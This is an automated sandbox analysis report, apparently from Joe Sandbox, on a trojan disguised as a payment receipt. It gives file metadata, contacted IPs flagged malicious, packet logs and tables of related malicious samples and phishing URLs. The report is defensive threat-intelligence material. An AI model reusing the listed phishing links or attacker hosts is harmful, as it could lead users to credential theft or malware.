                                    http://www.goodfont.co.krexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFinal-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              27.123.27.33
                                              		unknownAustralia
                                              		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                              192.0.78.230
                                              		unknownUnited States
                                              		2635AUTOMATTICUStrue
                                              162.0.236.49
                                              		unknownCanada
                                              		22612NAMECHEAP-NETUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:320833
                                              Start date:19.11.2020
                                              Start time:22:18:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Final-Payment-Receipt.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/1@5/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 10% (good quality ratio 9.2%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.2%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.210.248.85, 51.11.168.160, 40.88.32.150, 20.54.26.129, 52.230.222.68, 2.20.142.210, 2.20.142.209, 52.142.114.176, 92.122.213.194, 92.122.213.247, 51.104.144.132
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, dm3p.wns.notify.windows.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              22:19:29API Interceptor1x Sleep call for process: Final-Payment-Receipt.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AUTOMATTICUShttps://app.clio.com/link/AxWtfjmmzhjaGet hashmaliciousBrowse
                                              • 192.0.77.37
                                              KYC_DOC_.EXEGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              https://duemiglia.comGet hashmaliciousBrowse
                                              • 192.0.77.48
                                              http://homeschoolingteen.comGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              https://facialxpressions.com/mox/Get hashmaliciousBrowse
                                              • 192.0.77.48
                                              https://www.women.com/alexa/quiz-dialect-testGet hashmaliciousBrowse
                                              • 192.0.77.40
                                              dB7XQuemMc.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              Amazon-Service-Center[2368].docxGet hashmaliciousBrowse
                                              • 74.114.154.17
                                              Amazon-Service-Center[2368].docxGet hashmaliciousBrowse
                                              • 74.114.154.17
                                              http://www.bananalife.com.au/Get hashmaliciousBrowse
                                              • 192.0.77.48
                                              https://10009907.createsend1.com/t/t-l-xdrsjk-l-r/#bWFyay5ibHVtQGNvZ25pYW4uY29tGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              https://10009907.createsend1.com/t/t-l-xdrsjk-l-r/#bWFyay5ibHVtQGNvZ25pYW4uY29tGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              jtFF5EQoEE.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              4lsCTb3dCs.xlsxGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              KYC-DOC-11-10.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              http://fromdoctopdf.comGet hashmaliciousBrowse
                                              • 192.0.73.2
                                              JwekqCZAwt.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              https://achas.com.br/wp-includes/certificates/ssl.htmlGet hashmaliciousBrowse
                                              • 192.0.77.48
                                              http://srjbtkshetra.orgGet hashmaliciousBrowse
                                              • 192.0.77.37
                                              ORDER LIST.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              NAMECHEAP-NETUSPayment Advice.xlsGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Payment Advice.xlsGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Payment Advice.xlsGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Documentation.478396766.docGet hashmaliciousBrowse
                                              • 198.187.31.83
                                              Documentation.478396766.docGet hashmaliciousBrowse
                                              • 192.64.118.88
                                              tl2gnGyMz6eLhZG.exeGet hashmaliciousBrowse
                                              • 104.219.248.45
                                              Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                              • 185.61.154.55
                                              74725794.no.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                              • 198.54.120.58
                                              invoice payment.exeGet hashmaliciousBrowse
                                              • 185.61.154.32
                                              Certificates Profile Details Of Our Company.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                              • 199.188.200.253
                                              xgarnica.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              mcaceres.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              https://bxjg2oj292.zizera.com/F00929377Get hashmaliciousBrowse
                                              • 199.188.206.63
                                              Invoice Copy.exeGet hashmaliciousBrowse
                                              • 198.54.114.191
                                              DHL-#AWB130501923096PDF.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              https://agrabadconventionhall.com/redirect-outlook.com/server%20configuration/?#info@herbertarchitekten.deGet hashmaliciousBrowse
                                              • 198.187.31.56
                                              https://agrabadconventionhall.com/redirect-outlook.com/server configuration/Get hashmaliciousBrowse
                                              • 198.187.31.56
                                              https://bitly.com/35yFnnsGet hashmaliciousBrowse
                                              • 199.188.206.78
                                              DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU5Y3AbEmKxxY4ejt.exeGet hashmaliciousBrowse
                                              • 122.201.127.25
                                              invoice copy.exeGet hashmaliciousBrowse
                                              • 122.201.127.25
                                              90720.PDF.exeGet hashmaliciousBrowse
                                              • 122.201.127.25
                                              https://u18325032.ct.sendgrid.net/ls/click?upn=zS4zgBLRdqv-2B8jn6xdf2prIW-2Bu5RRqsJyRDox4UcGzXlLtZXKh-2BSZdYmhDPT7JGY4jxX_Y1wbDkFnclmd8Iup-2B4obtvYZ24jPnz-2FkCjwAJL5h1-2FUBiIZmBuxEzumh2vThqzs2MwOT8FwJ8EPBcEqg6KP-2FycJk-2F2Va4xgWqgk41eigoMKxSZCslQPYXXJTyBLhSNnf-2FfHuS9v-2BJ6gVlX2IldcbNV25S-2BhGKJ5ikDOjb6VKofpcSIJXj1RoRTBvsEmhfCwVKltNYHEeFV48egnRV6V4KnWoMHJ0Sj-2FwN2JHgUk1ZLcdijUJ-2Bz8-2FDXEgLBt4rnAaQR9NzHZrmoV6P0aYzw0QuOxTSkkyqxmlnATSVT76aW7xbupQFoWh65cZ12v40MRzaEHHdF38GJ3uTfQW-2FL0NpWtRpYTANHNCKEohMPQe-2BQvVeiILsQLZjGcPM9qRTD6v3q2Koik3PCTOfELr7SJHVJY7-2FfCS-2BMUdcVtrDR-2BT9SiInIdMsClC9ybdnqOy5qGoBL7ypaxonRJiRN5Ers-2BpXaekLUh980nmBrVhHhwMdhi3L9KJrNPzhUU2H-2F1W-2Bq8opHNx9G-2B2RERjjdpx8RREqR0-2BzlM-2Bule7-2FMQhvBR6-2FjBll-2BgcoS81hY1tr13MrGzIJEGC1sQXW6fx-2FUZxi-2BzZCRUyPRKMtUCBDApOpKHWFa28-2F8DrubD1Bqk2SUfTwOwvM1FZgJBQ66Khrcbm9CA2tY2mEvZ5sEIq0yife1LwRAkqrVJZOTwMsA0MNcwj-2B1ZpzIYx6y44ztvnDqRgupi8ATB2cQ6bqD-2FrXW32fRGw5fsVPzDvRhiRpb2MihVrYIJrCyHi4hDKuc56hJf0-2FIuUaTsEQt1b6LkoY0bm75M5K6SjYZb0-2B74T8xAcm7NEpMPpOxV5Fzod0iD0BcPB7FjV7FeKzarzQt8yEOK2aNEcxP6aXH7-2FgCgNZbxgs0wahAt1mmUZjNVwg6A-2Fkp-2BPT6-2F-2Fdi5-2FvmuSDwaZbzYamcNlNmA-3DGet hashmaliciousBrowse
                                              • 103.20.200.137
                                              BsMdJnus2L.exeGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              WhTpMNHuhn.exeGet hashmaliciousBrowse
                                              • 203.170.80.250
                                              QUOTE192.exeGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              http://britishgas-login-verify.oasisministries.org.au/Get hashmaliciousBrowse
                                              • 116.0.20.51
                                              New Order.exeGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              http://britishgas.co.uk-setup-info-billing-id61.hbct.com.au/Get hashmaliciousBrowse
                                              • 116.0.20.51
                                              https://isvconstructions.com.au/iso/?p=LFsAXVB1up6wUN57xRREGPHmGet hashmaliciousBrowse
                                              • 116.0.23.224
                                              ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                                              • 103.67.235.120
                                              http://relianceassure.comGet hashmaliciousBrowse
                                              • 163.47.74.144
                                              TNT Shipping Documents_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              260820MT103 Transfer_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              BL DRAFT_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              Sample__IMG.exeGet hashmaliciousBrowse
                                              • 203.170.80.250
                                              DRAFT HBL LGB07200191_pdf.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              INSPECTION FOR H&H - NEW ORDERS.exeGet hashmaliciousBrowse
                                              • 122.201.97.187
                                              Offer10044885_BMElectricalWholesaleLtd_08_06_2020.xlsmGet hashmaliciousBrowse
                                              • 203.170.83.97

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log
                                              Process:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1314
                                              Entropy (8bit):5.350128552078965
                                              Encrypted:false
                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.806563272516785
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:Final-Payment-Receipt.exe
                                              File size:552448
                                              MD5:8f5d29001a9f5d4f62b47af6442be5ab
                                              SHA1:4838464ffe421aad7c9d73ba19420b7e9c2c427d
                                              SHA256:8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
                                              SHA512:8457a4d90e4777439aa5415d656535a6701428919981885ffd2a9fd82b7be8f0e5dff2d206f74aadef358b5988fc805e910f5da18d99f681efde918d2ed93302
                                              SSDEEP:12288:FE2YwhOTAtvmsADL5L3cAHczt8W+GKOfbn78g:FXD8ktmsMLMBPj78g
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..d............... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4882da
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5FB5D6C8 [Thu Nov 19 02:22:00 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x882880x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x59c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x862e00x86400False0.871959380819data7.8171947974IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0x8a0000x59c0x600False0.419270833333data4.06876160117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x8a0900x30cdata
                                              RT_MANIFEST0x8a3ac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright 2014
                                              Assembly Version1.0.0.0
                                              InternalNameF5NI.exe
                                              FileVersion1.0.0.0
                                              CompanyName
                                              LegalTrademarks
                                              Comments
                                              ProductNameBlackjack
                                              ProductVersion1.0.0.0
                                              FileDescriptionBlackjack
                                              OriginalFilenameF5NI.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 19, 2020 22:20:26.977325916 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.148660898 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.148916006 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.149298906 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.322042942 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.391788006 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.391809940 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:27.392299891 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.392466068 CET4973080192.168.2.5162.0.236.49
                                              Nov 19, 2020 22:20:27.564534903 CET8049730162.0.236.49192.168.2.5
                                              Nov 19, 2020 22:20:47.666982889 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:47.953485966 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:47.953649044 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:47.953753948 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:48.240211010 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:48.246388912 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:48.246455908 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:20:48.246592045 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:48.246659994 CET4973180192.168.2.527.123.27.33
                                              Nov 19, 2020 22:20:48.533060074 CET804973127.123.27.33192.168.2.5
                                              Nov 19, 2020 22:21:28.858830929 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.875322104 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.875430107 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.875543118 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.891885996 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.891923904 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.891963005 CET8049733192.0.78.230192.168.2.5
                                              Nov 19, 2020 22:21:28.892087936 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.892112970 CET4973380192.168.2.5192.0.78.230
                                              Nov 19, 2020 22:21:28.908574104 CET8049733192.0.78.230192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 19, 2020 22:19:48.428203106 CET6015153192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:48.464210033 CET53601518.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:48.984335899 CET5696953192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:49.011492014 CET53569698.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:53.932404995 CET5516153192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:53.959470987 CET53551618.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:54.611696005 CET5475753192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:54.638799906 CET53547578.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:55.486553907 CET4999253192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:55.522375107 CET53499928.8.8.8192.168.2.5
                                              Nov 19, 2020 22:19:56.195149899 CET6007553192.168.2.58.8.8.8
                                              Nov 19, 2020 22:19:56.222517014 CET53600758.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:09.431056976 CET5501653192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:09.474910021 CET53550168.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:13.863044024 CET6434553192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:13.898453951 CET53643458.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:13.982206106 CET5712853192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:14.009272099 CET53571288.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:15.341979980 CET5479153192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:15.368985891 CET53547918.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:17.573630095 CET5046353192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:17.624994993 CET53504638.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:18.258366108 CET5039453192.168.2.58.8.8.8
